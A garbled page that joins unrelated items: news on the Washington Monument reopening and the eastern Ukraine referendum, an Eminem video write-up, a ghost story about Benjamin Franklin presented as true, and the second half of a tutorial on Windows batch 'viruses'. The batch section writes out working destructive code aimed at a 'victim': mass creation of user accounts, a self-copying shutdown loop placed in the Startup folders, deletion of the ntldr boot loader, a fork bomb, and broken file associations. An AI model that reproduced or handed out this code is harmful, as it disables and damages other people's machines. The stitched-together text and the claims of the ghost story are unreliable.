Washington Monument to Reopen Almost 3 Years After Quake Damage

The damage to the 130-year-old, 555-foot-tall obelisk from an unusual 5.8-magnitude earthquake in 2011 has taken nearly three years of repairs that have totaled $15 million, half of which was donated by philanthropist David Rubenstein

The Washington Monument is set to reopen Monday afterthree years of repairs and restoration following damage from a 2011 earthquake.

The monument was damaged when an unusual 5.8 magnitude earthquake affecting the capital sent vibrations to the very top of the 130-year old iconic obelisk, cracking the marble and sending debris raining down on tourists. Engineers worked for 33 months to restore the 555-foot structure, the Associated Press reports.

The restoration cost $15 million, but $7.5 million was donated by philanthropist David Rubenstein.

“The construction of the Washington Monument began in 1848 when private citizens raised money to build a memorial to honor our nation’s first president, and now it has been repaired thanks in part to the generosity of another private citizen, David Rubenstein, and the efforts of the Trust for the National Mall,” Secretary of the Interior Sally Jewell said in a statement. “This enduring spirit of public-private partnerships has made it possible for visitors to once again enjoy the Monument and its unmatched view of Washington, D.C.”

Rubenstein told the AP that the monument “symbolizes many things for our country — the freedoms, patriotism, George Washington, leadership. So it’s been moving to see how many people are affected by it.

Russian separatists in the eastern provinces of Donetsk, which proclaimed itself a republic last month, and Luhansk say voters resoundingly approved secession from Ukraine on Sunday in a referendum called illegitimate by Kiev and the U.S.

Separatists in eastern Ukraine say people there have voted overwhelmingly to secedefrom the state, following a Sunday referendum that Kiev and its Western supporters decried as illegitimate.

Approximately 89% of voters in the province of Donetsk — which already proclaimed itself a republic in April — have voted in favor of secession, organizers say. They also claim that 96% of voters in the neighboring province of Luhansk voted for independence. Donetsk is Ukraine’s most populous province, home to a tenth of the population.

“Counting the ballots proved to be surprisingly easy,” said Roman Lyagin, head of the separatist electoral commission in Donetsk, according to Russia Today.

“The number of people who said no was relatively small and there appeared to be only a tiny proportion of spoiled ballots, so we managed to carry out counting quite fast.”

The U.S. State Department earlier slammed the controversial referendum, warning that it stood in clear violation of international law.

“If these referenda go forward, they will violate international law and the territorial integrity of Ukraine,” said spokesperson Jen Psaki in a statement released on Saturday.

“The United States will not recognize the results of these illegal referenda.”

Russian President Vladimir Putin had also called for the referendum to be delayed; however, his spokesman Dmitri Pesko said residents in eastern Ukraine would not follow Putin’s advice because of an increase in fighting in the region against Kiev-backed forces.

It’s certainly not the first time that Eminem (real name: Marshall Mathers) has featured Debbie Mathers in his music, but the latest video does offer up a new spin in the form of an apology.

Filmed in Eminem’s childhood neighborhood in Detroit, the video is told from his mother’s point of view and features lines such as “Ma, you’re still beautiful to me because you’re my mom,” and “I love you, Debbie Mathers.” Though the rapper doesn’t refrain from referencing his unhappy childhood or his volatile relationship with his mother, the song is a marked contrast from past tracks, such as “Cleanin Out My Closet,” where Eminem was known for brutally excoriating his mother.

In “Headlights,” we see Eminem apologize to his mother for negatively referencing her the past and the video ends with a portrayal of the rapper and his mother reconnecting after years of fighting. “Headlights” features .Fun singer Nate Ruess and is the latest video from Eminem’s The Marshall Mathers LP 2, which was released last November.

Ben Franklin's Ghost ...and other contacts with the afterlife

Spirits, believers say, are around us at all times. They watch us and sometimes guide us. On occasion, they make themselves known through a thought, a dream, a fleeting shadow, or perhaps even an EVP. Rare is the moment they materialize. Willowdean Vance says she and some friends were witness to such an apparition – of the spirit of no less a personage than the great Benjamin Franklin! Is this just a flight of fancy? Or was Willowdean indeed honored by this ghostly celebrity – an event that not only suggested her own reincarnation, but opened the door to other, more personal ghost encounters? My Methodist Church upbringing did not prepare me for an apparition contact of any kind, much less the visit of so great a Founding Father as Benjamin Franklin. However, a chance invitation of old time friends, Lester and Roberta Minder of Santa Ana, California, to attend a Metaphysical Meeting in Santa Monica one evening resutled in the miracle visit of Bejamin Franklin before a group of eight shocked and delighted guests, including me.

The eight of us were seated in a study listening to the Rev. Don Cooper explain "afterlight" by candlelight. Suddenly, the ceiling of the room lit up with a large silver and pink cloud that whirled around the ceiling with great energy, like a lightning bolt. It came nearer and nearer the floor in the center of the room for some spellbound minutes.

Each of us sat huddled, speechless, watching this colorful cloud about five feet in diameter settle in the center of us and change colors in the form of a stocky-built man. He stopped in front of my chair, looking directly at me. The cloud that he appeared in vanished and revealed the exact physical image of Benjamin Franklin. He looked straight at me as he sadly said, "Don't you remember your ole friend?"

The Bible says, "Test the spirits," and I was so concerned this was a trick, my reply was, "If you are Ben, how and why do you know me?"

Past life revealed

"I knew you as Katy," Ben replied, "but your name was Catherine Ray, and you were my favorite correspondent. Your letters to me are on file at the University of Pennsylvania, if you forgot our happy friendship. You adoptd my young sister, Jane Mecom, in Massachusetts during the revolution and saved her from being captured by keeping her in your family home at Long Island as a relative. And later I boarded your son Ray in my Philadelphia home to attend school with my grandson, Temple. So we had a family relationship that lasted many long years."

When he spoke these warm words, I remembered how often in my childhood I informed everyone, to their dismay, that Ben Franklin was my guardian angel because his presence seemed so strong about me that I could not deny it.

Amd now my associates were so astounded by this miracle visit, it changed the lives of every witness.

Ben's biography contains a fascinating letter he wrote explaining the truth about death: We don't start to live until we die because the soul is immortal, and the flesh body is just a temporary shelter, loaned to us to experience some pleasure, to help us grow spiritually until we are reunited again in spirit, our permanent home.

Ben's group appearance opened the door to a surprise visit to me from my infant son, David, a few years later at a family gathering....

This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance.

3) Folder flooder

Here %random% is a variable that would generate a positive no. randomly. So this code would make start creating folders whose name can be any random number.

4) User account flooder
@echo off

net user %random% /add //create user account
goto x

This code would start creating windows user accounts whose names could be any random numbers.

5) Shutdown Virus
copy anything.bat “C:\Documents and Settings\Administrator\Start Menu\Programs\Startup”
copy anything.bat “C:\Documents and Settings\All Users\Start Menu\Programs\Startup” //these two commands will copy the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the computer in 0 seconds

Note : Files in Start up folder gets started automatically when windows starts . You should first two lines of code in every virus code so that it would copy itself in startup folder. Start up folder path in Windows 7 is C:\Users\sys\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Everytime the victim would start the computer, the batch file in start up would run and shutdown the computer immediately. You can remove this virus by booting the computer in Safe Mode and deleting the batch file from Start Up folder.

6) Deleting boot files
Goto C drive in Win XP , Tools->Folder Option->View
Now Uncheck the option 'Hide operating system files' and check option 'Show hidden files and folders'. Click apply

Now you can see the operating system files. There is a one file 'ntldr' which is boot loader used to boot the windows.

Lets make a batch file to
delete this file from victim's computer and the windows will not start then.

attrib -S -R -H C:\ntldr // -S,-R,-H to clear system file attribute, read only attribute , hidden file attribute respectively
del ntldr //delete ntldr file

After running this batch file , system will not reboot and a normal victim would definitely install the windows again.

7) Fork Bomb

%0|%0 //Its percentage zero pipe percentage zero

This code creates a large number of processes very quickly in order to saturate the process table of windows. It will just hang the windows .

8) Extension Changer

assoc .txt=anything // this command associates extension .txt with filetype anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything

Every extension is associated with a filetype like extension ‘exe’ is is associated with filetype ‘exefile’. To see them, just enter command ‘assoc’ in command prompt.
Above code changes the association of some extensions to filetype ‘anything’ (means u can write anything) which obviously doesn’t exist. So all exe (paint,games,command prompt and many more),jpeg,png,mpeg files wudn’t open properly.

1. Go to Start and then Click on Run
2. Type cmd & hit enter (To open Command Prompt ).
3. Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
4. Type D: or E: and hit enter
5. Type md con\ and hit enter (md - make directory)
6. You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
7. Open that directory, you will see the folder created of name con.
8. Try to delete that folder or rename that folder windows will show the error message.

How to delete that folder ?

It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.

1. Open Command Prompt
2. Type D: ( if u created this type of folder in D: drive) & hit enter
3. Type rd con\ (rd - remove directory)
4. Open that directory and the folder will not appear because it is removed.
